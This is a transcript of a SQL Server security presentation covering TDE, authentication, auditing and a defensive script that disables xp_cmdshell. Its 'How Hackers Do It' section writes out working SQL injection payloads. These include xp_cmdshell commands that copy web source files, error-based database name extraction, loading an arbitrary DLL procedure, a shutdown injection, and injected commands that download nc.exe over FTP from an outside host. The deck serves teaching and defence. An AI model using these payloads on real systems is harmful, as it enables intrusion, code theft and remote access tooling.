sql server security by clement arul
TRANSCRIPT
SQL SERVER SECURITY
Clement Arul, CTO, Mega Fortris
AGENDA
I'm a . . .
BUSINESS CHALLENGES
BUSINESS NEEDS
DB VULNERABILITIES
SQL SERVER 2005 SECURITY Recap
SQL SERVER 2008 SECURITY
Extensible Key Management (EKM)
Transparent Data Encryption (TDE)
Advantages of using TDE
CONTROL ACCESS
Authentication Enhancements
Authentication Features
ENSURE COMPLIANCE
Policy-Based Management
Reduced Surface Area Configuration
SQL SERVER AUDIT
How Hackers Do It?
SQL INJECTION BASIC TRICKS
Extended Stored Procedures
Enabling xp_cmdshell in SQL Server 2005 / 2008 / R2
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
Note: By default, xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. [If you have admin access, you can enable them.]
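The enabling sequence above has a mirror image that a DBA should know just as well. The following T-SQL is an added example (not from the original slides) that checks the state of xp_cmdshell and two other advanced options that are off by default, then turns xp_cmdshell back off; it assumes a login with ALTER SETTINGS permission and the option names exposed by sys.configurations.

```sql
-- Added example, not part of the original slide deck.
-- Step 1: expose the advanced options so sp_configure can see them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Step 2: report the current state of the options that matter.
-- value_in_use = 1 means the feature is live on this instance.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries')
ORDER BY name;

-- Step 3: revert the weak setting from the slide (xp_cmdshell = 1)
-- to the default (xp_cmdshell = 0) only if it is currently enabled,
-- so the script is safe to run repeatedly as a scheduled check.
IF EXISTS (SELECT 1 FROM sys.configurations
           WHERE name = 'xp_cmdshell' AND value_in_use = 1)
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;

-- Step 4: hide the advanced options again, restoring the default view.
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Re-running the SELECT in step 2 after the script completes should show value_in_use = 0 for xp_cmdshell; a later non-zero value with no change ticket behind it is worth treating as a finding.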
Example 1:
To execute a shell command that writes the output of the command dir c:\inetpub to a browseable file, assuming that the web server and the DB server reside on the same host:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
Alternatively, we can use sp_makewebtask:
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
Example 2: The SQL Server built-in function db_name() can be used to trigger an error that will return the name of the database:
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
Example 3: Obtaining the application's source code
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 4: Add a new extended procedure (virtually, you can execute whatever you want)
sp_addextendedproc xp_webserver, c:\temp\x.dll
exec xp_webserver
Example 5: Start and stop Windows services with xp_servicecontrol (START or STOP).
Example 6: Upload executables. Once xp_cmdshell is enabled, uploading becomes a cakewalk. [If the target allows FTP connections, inject the following queries]:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
Tools:
Windows: Bobcat; Unix: Sqlninja
';shutdown -
Q&A
References
Microsoft Security Development Lifecycle: http://www.microsoft.com/sdl
Security Configuration Benchmark for SQL Server 2005 & 2008 & R2: http://cisecurity.org/
The Open Web Application Security Project (OWASP): http://www.owasp.org
Contact: [email protected], http://www.innov8orz.com/blog